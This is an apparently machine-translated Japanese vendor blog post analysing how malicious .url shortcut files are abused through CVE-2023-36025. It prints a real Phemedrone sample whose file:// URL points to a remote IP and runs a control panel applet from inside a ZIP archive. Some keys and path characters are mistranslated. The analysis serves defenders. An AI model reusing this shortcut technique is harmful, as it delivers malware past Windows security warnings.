悪意への近道、その2：悪意のあるURLファイルの静的解析とその背後にある手口

ファイルベースの攻撃がますますモジュール化され、回避能力が高まるにつれ、最も破壊的なマルウェアの連鎖を引き起こすのは、最も複雑なファイルではなく、最も単純なファイルであることが多くなっています。.urlファイルもその一例です。構造的には最小限のものですが、URLファイルはますます高度な方法で悪用されるようになっており、一般的かつ過小評価されている脅威のベクトルとなっています。 

URLファイルの悪用に関する3部構成のシリーズの第2部では、敵がURLファイルに何を埋め込んでいるのか、また、防御者が実行前に脅威を検知する方法など、静的なトラデクラフトに焦点を当てます。この記事では、侵害の指標（IOC）、一般的なファイル構造、および過去の悪用パターンについて説明します。また、この記事では、OPSWATFileTAC（深層静的検査プラットフォーム）が、脅威が爆発する前に、静止状態の脅威を発見するのに役立つことも紹介します。

URLファイルは、ここ数年、脅威キャンペーン活動で取り上げられることが多くなっています。Proofpointが報告した2023年10月に発生した活動の増加は、脅威行為者が最初にDarkGateトロイの木馬を配布し、後にNetSupport RATを被害者に配布するというものでした。  

その後、1月中旬にトレンドマイクロは、「Phemedrone」と呼ばれる情報窃取型トロイの木馬の亜種を被害者にプッシュする活発なキャンペーンを指摘しました。これらのケースではいずれも、多段階の脅威シーケンスが利用されており、脅威行為者は攻撃のコンポーネントとしてURLファイルを統合していました。 

情報源によって文書化されているように、これらの攻撃で配布されたURLファイルには特定の目的があった。これらは、SmartScreenのバイパスを可能にするWindowsの脆弱性であるCVE-2023-36025の悪用によって使用された。細工されたURLファイルを使用することで、敵対者は、信頼できないコンテンツに関する警告アラートでユーザーに疑念を抱かせることなく、悪意のあるファイルのダウンロードを連鎖的に引き起こすことができる。 

これをより完全に理解するために、基本的なインターネット・ショートカット・ファイルの例を振り返ってみよう：

[インターネット・ショートカット］
opswat

非公式なドキュメントに記載されているように、URL の値で使用されるプロトコルのプレフィックスは、リモートのプレフィックスとして http や https に限定されるものではなく、サポートされているさまざまなプロトコルを指定することができます。この例を見るために、最近の Phemedrone 配布キャンペーンのサンプルを見てみましょう：69941417f26c207f7cbbbe36ce8b4d976640a3d7f407d316932428e427f1980b.

[{000214A0-0000-0000-C000-000000000046}]
提案3=19,9

[インターネット・ショートカット］
IDList=
URL=file://51.79.185[.]145/pdf/data1.zip/pdf1.cpl
IconIndex=13
ホットキー=0
IconFile=C:◆Program Files (x86)◆MicrosoftEdge◆アプリケーション◆IconFile.exe

この悪意のあるURLファイルは、パスにfile://という接頭辞を使用しており、セキュリティ・コントロールのバイパスに関連しています。このURLの重要な属性を明らかにしよう：

• 接頭辞はfile://で、通常はローカルにアクセス可能なファイルパスへの参照を示す。
• しかし、参照されるパスはネットワーク上の場所、つまりリモート（信頼されていない）IPアドレスにある。
• 参照されるパスのターゲットは、.cplファイル、または実行可能ファイルタイプであるコントロールパネルアプレットです。
• URLの.cplファイルへのパスはZIPアーカイブの中にある。これは、エクスプローラや他のコンポーネントがZIPファイルをディレクトリ部分として抽象化できるように、Windowsでサポートされている珍しい構造である。

.cpl(DLL)ファイルのような直接実行可能なファイルタイプから、厄介なコントロール機能によって中断されたり、ユーザーにフラグを立てられたりすることなく、悪意のあるコンテンツ実行の連鎖を開始できる能力は、犯罪行為者にとって魅力的です。